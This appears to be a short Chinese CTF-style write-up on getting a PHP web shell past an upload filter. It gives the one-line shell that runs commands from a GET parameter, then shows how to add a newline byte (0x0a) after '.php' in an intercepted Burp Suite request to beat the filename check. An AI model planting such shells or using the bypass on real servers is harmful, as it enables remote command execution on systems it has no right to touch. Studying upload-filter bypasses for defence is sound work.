Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
@Aurora.33 分钟前
【项目日记(三)】zym大哥大36 分钟前
Linux实现网络计数器帅云毅1 小时前
文件上传--解析漏洞和编辑器樽酒ﻬق1 小时前
深度解析 Kubernetes 配置管理:如何安全使用 ConfigMap 和 Secret白总Server1 小时前
Nginx 中间件tjjingpan1 小时前
HCIA-Access V2.5_18_网络管理基础_1_网络管理系统架构xxy!2 小时前
OSI七层模型和TCP/IP四层模型云天徽上2 小时前
【数据可视化-27】全球网络安全威胁数据可视化分析(2015-2024)unique_pursuit2 小时前
CS144 Lab 6 实战记录:构建 IP 路由器网络之路Blog2 小时前
【实战中提升自己】内网安全部署之端口隔离与MAC地址认证